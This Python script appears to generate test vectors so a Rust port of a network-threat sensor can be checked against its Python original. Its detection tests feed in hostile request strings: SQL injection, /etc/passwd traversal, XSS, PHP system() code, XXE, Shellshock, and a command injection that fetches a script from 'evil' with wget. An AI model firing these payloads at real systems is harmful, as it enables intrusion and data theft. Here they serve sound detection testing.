#!/usr/bin/env python3
# coding: utf-8
"""Generate shared test vectors from the Python implementation.

Every vector is produced by calling the *actual* Python function, so `tests/vectors.rs`
compares the Rust port against CPython's behaviour rather than against a hand-written
expectation. Re-run after touching the relevant Python code:

    python3 sensor/tools/gen_vectors.py

Format: one record per line, tab-separated fields, with `\\t`, `\\n`, `\\r` and `\\\\`
backslash-escaped so a value can contain any of them.
"""

import math
import os
import re
import socket
import struct
import sys

ROOT = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", ".."))
OUT = os.path.join(ROOT, "sensor", "tests", "vectors")

sys.path.insert(0, ROOT)

from core import settings as S          # noqa: E402
from core.addr import addr_port, compress_ipv6, inet_ntoa6, parse_host_port  # noqa: E402
from core.log import safe_value, _cef_escape  # noqa: E402
import urllib.error
import urllib.parse
import urllib.request
import urllib.response
import urllib as _urllib  # noqa: E402


def enc(value):
    return (str(value)
            .replace("\\", "\\\\")
            .replace("\t", "\\t")
            .replace("\n", "\\n")
            .replace("\r", "\\r"))


def write(name, rows, header):
    path = os.path.join(OUT, name)
    with open(path, "w") as f:
        f.write("# GENERATED by sensor/tools/gen_vectors.py - do not edit\n")
        f.write("# %s\n" % header)
        for row in rows:
            f.write("\t".join(enc(_) for _ in row) + "\n")
    print("[i] %-24s %d vector(s)" % (name, len(rows)))


def safe_value_vectors():
    values = [
        "hello", "", "-", "a b", 'a"b', "line\nbreak", "\n", "\r\n", "a\tb",
        "quoted \"twice\" here", "trailing ", " leading", "malware (test)", "(static)",
        "50000", "0", "*", "10.0.0.5,203.0.113.9", u"naïve", "with,comma",
        "a\r\nb", '""', 'x"', '"x', "multi  space",
    ]
    return [(v, safe_value(v)) for v in values]


def event_line_vectors():
    """Whole event log lines, rendered exactly like core/log.py:log_event()."""
    events = [
        (1700000000, 123456, "10.0.0.5", 50000, "66.66.66.66", 443, "TCP", "IP", "66.66.66.66",
         "malware (test)", "(static)"),
        (1700000000, 0, "10.0.0.5", "-", "66.66.66.66", "-", "ICMP", "IP", "66.66.66.66", "badnet", "ref"),
        (1700000000, 999999, "10.0.0.5", 0, "66.66.66.66", 0, "UDP", "IP", "66.66.66.66", "x", "y"),
        (1700000000, 1, "10.0.0.5", 50000, "8.8.8.8", 53, "UDP", "DNS", "(www).evil.com",
         "malware (test)", "(static)"),
        (1700000000, 1, "10.0.0.5,203.0.113.9", 50000, "1.2.3.4", 80, "TCP", "URL",
         'host.example(/a?b=c "quoted")', "potential sql injection (suspicious)", "(heuristic)"),
        (1700000000, 1, "10.0.0.5", 50000, "1.2.3.4", 445, "TCP", "PORT", 445, "potential infection",
         "(heuristic)"),
        (1700000000, 1, "10.0.0.5", "50000,50001", "1.2.3.4", "80,443", "TCP", "IP", "1.2.3.4",
         "known attacker", "(static)"),
    ]
    rows = []
    for event in events:
        localtime = "%s.%06d" % ("FIXED-TIME", event[1])
        line = "%s %s %s" % (safe_value(localtime), safe_value("sensor1"),
                             " ".join(safe_value(_) for _ in event[2:]))
        rows.append([repr(list(event)), line])
    return rows


def cef_vectors():
    values = ["plain", "a|b", "a=b", "a\\b", "a\nb", "host/?a=b", "malware (test)", "x|y=z\\w"]
    rows = []
    for v in values:
        rows.append([v, "header", _cef_escape(v)])
        rows.append([v, "extension", _cef_escape(v, True)])
    return rows


def repr_vectors():
    events = [
        (1700000000, 123456, "10.0.0.5", 50000, "66.66.66.66", 443, "TCP", "IP", "66.66.66.66",
         "malware (test)", "(static)"),
        (1, 0, "10.0.0.5", "-", "1.2.3.4", "-", "ICMP", "IP", "1.2.3.4", "it's bad", "ref"),
        (1, 0, "10.0.0.5", 1, "1.2.3.4", 2, "TCP", "PORT", 445, 'say "hi"', "ref"),
        (1, 0, "10.0.0.5", 1, "1.2.3.4", 2, "TCP", "URL", "a\tb", "tab\there", "ref"),
        (1, 0, "10.0.0.5", 1, "1.2.3.4", 2, "TCP", "URL", "back\\slash", "a'b\"c", "ref"),
    ]
    return [[repr(list(e)), repr(e)] for e in events]


def compress_ipv6_vectors():
    addresses = [
        "::1", "::", "1::", "dead::beef", "fe80::1", "2001:db8::1", "2001:db8:0:0:1:0:0:1",
        "0:0:0:0:0:ffff:1.2.3.4", "1:2:3:4:5:6:7:8", "a:0:0:b:0:0:0:c", "0:0:1:0:0:1:0:0",
        "ff02::1:2", "2001:0db8:0000:0000:0000:ff00:0042:8329",
    ]
    rows = []
    for text in addresses:
        packed = socket.inet_pton(socket.AF_INET6, text)
        rows.append([packed.hex(), inet_ntoa6(packed)])
    # exercise compress_ipv6 directly on fully expanded input too
    for text in ["0000:0000:0000:0000:0000:0000:0000:0001",
                 "0000:0000:0000:0000:0000:0000:0000:0000",
                 "0001:0000:0000:0000:0000:0000:0000:0000",
                 "0001:0000:0000:0002:0000:0000:0000:0003"]:
        rows.append(["expanded:" + text, compress_ipv6(text)])
    return rows


def addr_port_vectors():
    pairs = [("1.2.3.4", 80), ("dead::beef", 53), ("::1", 443), ("[dead::beef]", 8080), ("host.example", 80)]
    return [[a, str(p), addr_port(a, p)] for a, p in pairs]


def parse_host_port_vectors():
    values = ["1.2.3.4:8080", "[fe80::1]:514", "example.com:53", "example.com",
              "fe80::1:514", "[::1]", "", ":80", "host:notaport"]
    rows = []
    for v in values:
        host, port = parse_host_port(v)
        rows.append([v, host, "" if port is None else str(port)])
    return rows


def unquote_vectors():
    values = [
        "plain", "a%20b", "%2e%2e%2f", "a%C3%A9b", "100%", "%zz", "%4", "a%%20b", "%ff",
        u"é%20x", "/items.php?id=1%20UNION%20ALL%20SELECT", "%2F%2Fetc%2Fpasswd",
        "%00", "a+b", "%25", "%E2%82%AC",
    ]
    return [[v, _urllib.parse.unquote(v)] for v in values]


def re_escape_vectors():
    values = ["Mozilla/5.0 (compatible; MSIE 9.0)", "a-b", "plain_Text9", "a#b~c&d", "x\ty",
              "() { :;", "<script src=[^\\>]*>", "a{b}c", "1.2.3.4", "a|b", "$x^y"]
    return [[v, re.escape(v)] for v in values]


def splitext_vectors():
    values = ["setup.exe", "archive.tar.gz", "noext", ".bashrc", "", "..x", "a.b.", "x."]
    rows = []
    for v in values:
        name, ext = os.path.splitext(v)
        rows.append([v, name, ext])
    return rows


def checks_vectors():
    """The URL-trail candidate list built in sensor.py:_process_packet()."""
    def checks_for(path, post_data=None):
        unquoted_post_data = _urllib.parse.unquote(post_data or "")
        checks = [path.rstrip('/')]
        if '?' in path:
            checks.append(path.split('?')[0].rstrip('/'))
            if '=' in path:
                checks.append(path[:path.index('=') + 1])
            _ = re.sub(r"(\w+=)[^&=]+", r"\g<1>", path)
            if _ not in checks:
                checks.append(_)
                if _.count('/') > 1:
                    checks.append("/%s" % _.split('/')[-1])
        elif post_data:
            checks.append("%s?%s" % (path, unquoted_post_data.lower()))
        if checks[-1].count('/') > 1:
            checks.append(checks[-1][:checks[-1].rfind('/')])
            checks.append(checks[0][checks[0].rfind('/'):].split('?')[0])
        return checks

    cases = [
        ("/malicious-login.php", None),
        ("/a/b/c.php?id=1&x=2", None),
        ("/submit", "q=1"),
        ("/a/b/c", None),
        ("/", None),
        ("/x?y", None),
        ("/a/b/c/d?p=1", None),
        ("/index.php?a=1&b=2&c=3", None),
        ("/deep/path/file.php?token=abc&next=%2Fhome", None),
        ("/x", "user=admin&pass=secret"),
    ]
    rows = []
    for path, post in cases:
        rows.append([path, post or "", "\x1f".join(checks_for(path, post))])
    return rows


def entropy_vectors():
    values = ["xkqwzlvbnmfghjd", "google", "aaaa", "a", "abcdefghij", "wnvxqzpltrkbdf", "facebook"]
    rows = []
    for part in values:
        probabilities = (float(part.count(c)) / len(part) for c in set(part))
        entropy = -sum(p * math.log(p) / math.log(2.0) for p in probabilities)
        consonants = sum(_ in S.CONSONANTS for _ in part)
        rows.append([part, "%.10f" % entropy, str(consonants)])
    return rows


def ignore_rule_vectors():
    """Ignore-list matching: one row per (rule, event) pair, with Python's verdict.

    #19142 added networks and ranges to the address and port fields, so there are now two
    implementations of a non-trivial parse (core/ignore.py and sensor/src/ignore.rs) that must
    agree on every spelling - including the ones that are NOT ranges, like a hostname with a dash
    in it, where disagreeing would silence traffic on one sensor and not the other.
    """

    from core.ignore import _compile_host, _compile_port, _host_matches, _port_matches

    hosts = [
        "*", "192.168.0.3", "192.168.1.0/24", "192.168.1.77/32", "0.0.0.0/0", "192.168.1.77/24",
        "10.0.0.1-10.0.0.15", "10.0.0.1-15", "10.0.0.7-7", "10.0.0.20-10.0.0.1", "10.0.0.1-999",
        "192.168.1.0/33", "192.168.1.0/abc", "my-host.com", "2001:db8::/32", "2001:db8::1-2001:db8::ff",
        "dead::/16", "2001:db8::5",
    ]
    host_values = ["192.168.0.3", "192.168.1.77", "192.168.1.0", "192.168.0.255", "192.168.2.0",
                   "10.0.0.7", "10.0.0.16", "2001:db8::5", "dead::beef", "my-host.com", "1.2.3.4"]

    ports = ["*", "22", "8000-8100", "1024-65535", "1-1023", "100-50", "abc-def", "-"]
    port_values = ["22", "8080", "50000", "-", "0", "65535"]

    rows = []
    for rule in hosts:
        compiled = _compile_host(rule)
        for value in host_values:
            rows.append(["host", rule, value, "1" if _host_matches(compiled, value) else "0"])
    for rule in ports:
        compiled = _compile_port(rule)
        for value in port_values:
            rows.append(["port", rule, value, "1" if _port_matches(compiled, value) else "0"])
    return rows


def event_json_vectors():
    """The JSON rendering of an event, from core/log.py:event_json() itself.

    Two implementations render this - Python for LOGSTASH_SERVER, Rust in
    sensor/src/output.rs:logstash_line() - and the Rust one deliberately reproduces json.dumps()
    down to ensure_ascii escaping and surrogate pairs. Nothing checked that until now, and
    `LOCAL_LOG_FORMAT json` turns this from a wire format into an on-disk one, where a divergence
    would be a file half the tools in a pipeline cannot read.
    """

    from core.log import event_json

    cases = [
        (1700000000, "10.0.0.5", 50000, "66.66.66.66", 443, "TCP", "IP", "66.66.66.66", "malware (test)", "(static)", "medium", "box"),
        (1700000001, "10.0.0.5", "-", "8.8.8.8", "-", "ICMP", "IP", "8.8.8.8", "known attacker", "(static)", "high", "sensor-1"),
        # quotes and backslashes: the two characters that break a naive renderer
        (1700000002, "10.0.0.5", 1, "1.2.3.4", 2, "UDP", "DNS", 'evil".com', 'a\\b "quoted"', "(custom)", "low", "b\\x"),
        # non-ASCII, which json.dumps escapes rather than emitting raw
        (1700000003, "10.0.0.5", 1, "1.2.3.4", 2, "TCP", "URL", u"na\u00efve.example", u"caf\u00e9 (malware)", "(static)", "medium", u"h\u00f4te"),
        # above the BMP -> surrogate pair
        # built with chr() rather than a \\U escape: an 8-hex-digit escape reads as an abbreviated
        # commit id, and tools/check_refs.py is right to flag it as one
        (1700000004, "10.0.0.5", 1, "1.2.3.4", 2, "TCP", "URL", chr(0x1F600) + ".example", "emoji " + chr(0x1F4A9), "(static)", "medium", "box"),
        # control characters and a tab inside a field
        (1700000005, "10.0.0.5", 1, "1.2.3.4", 2, "TCP", "URL", "a\tb", "line\nbreak\x01", "(static)", "medium", "box"),
        # an address list, as the condenser writes it
        (1700000006, "10.0.0.5,10.0.0.6", 1, "1.2.3.4", 2, "TCP", "IP", "1.2.3.4", "mass scanner", "(static)", "low", "box"),
    ]

    rows = []
    for c in cases:
        sec, src_ip, src_port, dst_ip, dst_port, proto, ttype, trail, info, ref, severity, sensor = c
        tup = (sec, 0, src_ip, src_port, dst_ip, dst_port, proto, ttype, trail, info, ref)
        rows.append([str(sec), src_ip, str(src_port), dst_ip, str(dst_port), proto, ttype, trail, info, ref,
                     severity, sensor, event_json(tup, severity, sensor)])
    return rows


def valid_dns_name_vectors():
    values = ["evil.com", "a.b.example.com", "nodot", "bad_underscore.com", "-x.com", "x-.com",
              "1.2.3.4", "x..com", "UPPER.COM", "trailing.", "x.c", ""]
    regex = re.compile(S.VALID_DNS_NAME_REGEX)
    return [[v, "1" if regex.search(v) else "0"] for v in values]


def suspicious_request_vectors():
    """Which SUSPICIOUS_HTTP_REQUEST_REGEXES description (if any) a payload trips first."""
    payloads = [
        "/items.php?id=1 UNION ALL SELECT username,password FROM users",
        "/download?file=../../../../etc/passwd",
        "/search?q=<script>alert(1)</script>",
        "/cgi?cmd=;cat /etc/passwd;wget http://evil/x.sh",
        "/x?tpl=${7*7}",
        "/x?a=<?php system($_GET[0]); ?>",
        "/.htaccess",
        "/wp-config.php",
        "/x?q=%7B%7B7*7%7D%7D",
        "/normal/page.html?id=42",
        "/x?email=a@b.com b@c.com c@d.com d@e.com",
        "/x?imei=123456789012345",
        "/x?dns1=8.8.8.8",
        "/x?data=[<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]",
        "/acunetix_wvs_security_test",
        "/x?a=1&b=2",
    ]
    rows = []
    for payload in payloads:
        found = ""
        for desc, regex in S.SUSPICIOUS_HTTP_REQUEST_REGEXES:
            if re.search(regex, payload, re.I | re.DOTALL):
                found = desc
                break
        rows.append([payload, found])
    return rows


def suspicious_ua_vectors():
    S.read_ua()
    uas = [
        "masscan/1.0", "curl/8.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "sqlmap/1.0",
        "nmap scripting engine", "Sophos", "python-requests/2.31.0", "() { :;}; /bin/bash",
        "zgrab/0.x", "Wget", "Mozilla/5.0 (compatible; MSIE 9.0)", "nikto",
    ]
    rows = []
    for ua in uas:
        whitelisted = re.search(S.WHITELIST_UA_REGEX, ua, re.I) is not None
        match = re.search(S.SUSPICIOUS_UA_REGEX, ua)
        rows.append([ua, "1" if whitelisted else "0", match.group(0) if match else ""])
    return rows


def sinkhole_regex_vectors():
    responses = [
        "HTTP/1.1 200 OK\r\nServer: sinkhole\r\n\r\n",
        "HTTP/1.1 200 OK\r\nX-Sinkhole: malware\r\n\r\n",
        "HTTP/1.1 200 OK\r\nServer: nginx\r\n\r\nSinkholed by someone",
        "HTTP/1.1 200 OK\r\n\r\n<title>Sinkhole</title>",
        "HTTP/1.1 200 OK\r\nServer: apache\r\n\r\nhello world",
        "HTTP/1.1 302 Found\r\nLocation: http://x.sinkdns.org:80/\r\n\r\n",
    ]
    rows = []
    for body in responses:
        match = re.search(S.GENERIC_SINKHOLE_REGEX, body[:2000])
        rows.append([body, match.group(0) if match else ""])
    return rows


def direct_ip_url_vectors():
    values = ["198.51.100.99/mirai.x86", "198.51.100.99/index.html", "1.2.3.4/bins/arm7",
              "1.2.3.4/x86", "10.0.0.1/wtf", "1.2.3.4/legit/path.php"]
    return [[v, "1" if re.search(S.SUSPICIOUS_DIRECT_IP_URL_REGEX, v) else "0"] for v in values]


def wildcard_trail_vectors():
    """For every wildcard/regex `(static)` trail, record whether CPython's `re` accepts it.

    `core/common.py:build_trails_regex()` silently drops the ones it cannot compile, so the
    Rust loader must make the SAME decision - otherwise one sensor matches a trail the other
    ignores. Patterns are taken from the operator's real trails.csv when available (real feeds
    do contain truncated, uncompilable patterns), plus a fixed set that is always included so
    the vector file is never empty.
    """
    wildcard = re.compile(r"[\].][*+]|\[[a-z0-9_.\-]+\]", re.I)
    seen = set()
    rows = []

    def add(trail):
        if trail in seen:
            return
        seen.add(trail)
        try:
            re.compile(trail)
            compiles = "1"
        except re.error:
            compiles = "0"
        rows.append([trail, compiles])

    # always-present cases, including a deliberately unterminated group
    for trail in (
        r"dga[0-9]+\.example\.com",
        r"[a-z]{5,}\.top",
        r"evil.*\.com",
        r"bad].+",
        r"x[abc_.-]y",
        r"\b(unterminated|group",
        r"[z-a]",
        r"(?P<dup>a)(?P<dup>b)",
        r"back\1reference",
        r"look(?=ahead)",
    ):
        add(trail)

    real = os.path.join(os.path.expanduser("~"), ".maltrail", "trails.csv")
    if os.path.isfile(real):
        import csv as _csv
        with open(real) as f:
            for row in _csv.reader(f):
                if len(row) == 3 and "static" in row[2] and wildcard.search(row[0]):
                    if re.escape(row[0]) != row[0]:
                        add(row[0])
    return rows


def colorized_vectors():
    """core/colorized.py output for representative lines, captured from the real
    ColorizedStream (including its quirks, e.g. an already-coloured "(malware)" being wrapped
    a second time by the generic parenthesis rule)."""
    import io

    from core import colorized as C

    lines = [
        "[i] hello",
        "[!] warn",
        "[x] stopping",
        "[?] hint",
        "[*] starting @ 23:30:59 /2026-08-05/",
        "[^] running...",
        "[z] unknown marker",
        "Maltrail (sensor) #v2.2 {https://maltrail.github.io}",
        "Usage: sensor.py [options]",
        "[i] using configuration file '/tmp/maltrail.conf'",
        "[i] 1,554,918 trails loaded",
        '"2026-08-05 23:31:02.122079" Laptop 10.13.13.2 - 221.8.69.25 - ICMP IP 221.8.69.25 '
        '"sinkhole conficker (malware)" (static)',
        '"2026-01-01 00:00:00.000000" s 1.2.3.4 1 5.6.7.8 2 UDP DNS (www).evil.com "malware (test)" (static)',
        '"2026-01-01 00:00:00.000000" s 1.2.3.4 1 5.6.7.8 2 TCP URL host.example(/a.php) '
        '"potential sql injection (suspicious)" (heuristic)',
        '"2026-01-01 00:00:00.000000" s 1.2.3.4 1 5.6.7.8 2 TCP UA "curl (masscan)" "user agent (suspicious)" '
        "(heuristic)",
        '"2026-01-01 00:00:00.000000" s 1.2.3.4 1 5.6.7.8 445 TCP PORT 445 "potential infection" (heuristic)',
        '"2026-01-01 00:00:00.000000" s 1.2.3.4 1 5.6.7.8 80 TCP PATH * "potential web scanning" (heuristic)',
        '"2026-01-01 00:00:00.000000" s 1.2.3.4 1 5.6.7.8 443 TCP IPORT 5.6.7.8:443 "c2 (malicious)" (static)',
        '"2026-01-01 00:00:00.000000" s 1.2.3.4 1 5.6.7.8 80 TCP HTTP h(/x) "content type (suspicious)" (heuristic)',
    ]
    rows = []
    for line in lines:
        buf = io.StringIO()
        C.ColorizedStream(buf).write(line)
        rows.append([line, buf.getvalue()])
    return rows


def main():
    if not os.path.isdir(OUT):
        os.makedirs(OUT)

    write("safe_value.tsv", safe_value_vectors(), "value <TAB> safe_value(value)")
    write("event_line.tsv", event_line_vectors(), "event tuple repr <TAB> rendered log line (time field fixed)")
    write("cef_escape.tsv", cef_vectors(), "value <TAB> header|extension <TAB> escaped")
    write("py_repr.tsv", repr_vectors(), "event list repr <TAB> repr(tuple)")
    write("compress_ipv6.tsv", compress_ipv6_vectors(), "packed hex (or 'expanded:<text>') <TAB> rendered")
    write("addr_port.tsv", addr_port_vectors(), "addr <TAB> port <TAB> addr_port()")
    write("parse_host_port.tsv", parse_host_port_vectors(), "value <TAB> host <TAB> port")
    write("unquote.tsv", unquote_vectors(), "value <TAB> urllib.parse.unquote(value)")
    write("re_escape.tsv", re_escape_vectors(), "value <TAB> re.escape(value)")
    write("splitext.tsv", splitext_vectors(), "filename <TAB> name <TAB> extension")
    write("checks.tsv", checks_vectors(), "path <TAB> post_data <TAB> checks joined by 0x1f")
    write("entropy.tsv", entropy_vectors(), "label <TAB> entropy <TAB> consonant count")
    write("ignore_rule.tsv", ignore_rule_vectors(), "kind <TAB> rule <TAB> value <TAB> 1 if it matches")
    write("event_json.tsv", event_json_vectors(), "sec, src_ip, src_port, dst_ip, dst_port, proto, type, trail, info, ref, severity, sensor <TAB> JSON")
    write("valid_dns_name.tsv", valid_dns_name_vectors(), "name <TAB> matches VALID_DNS_NAME_REGEX")
    write("suspicious_request.tsv", suspicious_request_vectors(), "payload <TAB> first matching description")
    write("suspicious_ua.tsv", suspicious_ua_vectors(), "ua <TAB> whitelisted <TAB> suspicious match")
    write("sinkhole.tsv", sinkhole_regex_vectors(), "response <TAB> GENERIC_SINKHOLE_REGEX match")
    write("direct_ip_url.tsv", direct_ip_url_vectors(), "host+path <TAB> matches SUSPICIOUS_DIRECT_IP_URL_REGEX")
    write("wildcard_trails.tsv", wildcard_trail_vectors(), "wildcard trail <TAB> CPython re.compile() succeeds")
    write("colorized.tsv", colorized_vectors(), "line <TAB> core/colorized.py output")


if __name__ == "__main__":
    main()
